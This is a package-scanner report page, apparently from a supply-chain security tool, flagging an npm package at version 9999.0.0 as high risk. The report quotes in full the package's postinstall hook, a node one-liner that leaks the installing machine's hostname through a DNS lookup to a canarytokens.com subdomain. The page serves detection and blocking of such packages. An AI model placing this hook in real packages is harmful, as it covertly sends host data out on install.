PkgRadar

npm · registry.npmjs.org

picnic-react-mise-en-place

DNS / OAST exfiltration: matched "canarytokens.com"

Why PkgRadar flagged 9999.0.0

SeveritySignalEvidence
highDNS / OAST exfiltrationmatched "canarytokens.com" · package/package.json
highInstall Lifecycle Remote Or Execpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\"" · package.json
highInstall Lifecycle Dns Or Oastpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\"" · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
9999.0.0High risk952026-06-03

Related campaigns

Block this in CI

PkgRadar gates picnic-react-mise-en-place (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]